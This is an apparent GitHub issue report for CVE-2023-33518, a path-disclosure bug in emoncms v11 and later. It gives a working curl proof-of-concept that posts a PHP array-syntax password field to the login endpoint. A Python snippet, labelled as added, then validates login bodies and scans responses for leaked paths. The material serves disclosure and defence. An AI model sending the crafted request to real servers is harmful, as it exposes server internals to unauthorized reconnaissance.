CVE-2023-33518: A bug leaked server web directory and other information · Issue #1856 · emoncms/emoncms

emoncms v11 and later was discovered to contain an information disclosure vulnerability which allows attackers to obtain the web directory path and other information leaked by the server via a crafted web request.

emoncms version 11 and later suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special HTTP request.

curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: text/plain, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' \
  -H 'Host: {IP}:{PORT}' \
  -H 'Connection: Keep-alive' \
  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'
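
A defensive check for the request shown above, added here as an example (not code from emoncms or from the issue report): it rejects login bodies that send a scalar field in PHP array syntax, as `password%5B%5D` does, and scans a response body for absolute `.php` paths. The field names come from the request above; the function names, the path regex and the sample inputs are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Fields the login endpoint receives as single strings (names from the request above).
SCALAR_FIELDS = {"username", "password", "rememberme", "referrer"}

# PHP parses "name[]" and "name[key]" as arrays; group 1 is the base field name.
ARRAY_SYNTAX = re.compile(r"^([^\[\]]+)\[[^\]]*\]")

# Heuristic: absolute Unix or Windows filesystem path ending in .php.
PATH_LEAK = re.compile(r"(?:[A-Za-z]:\\|/)(?:[\w.\-]+[\\/])+[\w.\-]+\.php")


def validate_login_body(body: str) -> list[str]:
    """Return the problems found in a form-urlencoded login body."""
    problems, seen = [], set()
    for name, _value in parse_qsl(body, keep_blank_values=True):
        match = ARRAY_SYNTAX.match(name)
        base = match.group(1) if match else name
        if base not in SCALAR_FIELDS:
            continue
        if match:
            problems.append(f"{base}: array syntax not allowed")
        elif base in seen:
            problems.append(f"{base}: duplicate parameter")
        seen.add(base)
    return problems


def leaked_paths(response_body: str) -> list[str]:
    """Return absolute .php paths found in a response body."""
    return PATH_LEAK.findall(response_body)


if __name__ == "__main__":
    # Body copied from the request above, then a constructed well-formed body.
    print(validate_login_body("password%5B%5D=1&referrer=&rememberme=1&username=1"))
    print(validate_login_body("username=alice&password=s3cret&rememberme=1&referrer="))
    # Constructed response text containing a placeholder path.
    print(leaked_paths("Warning: bad argument in /srv/example/app/login_handler.php on line 1"))
```

Running `validate_login_body` in front of the login handler and `leaked_paths` in a regression test against the patched endpoint covers both the input shape and the symptom.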
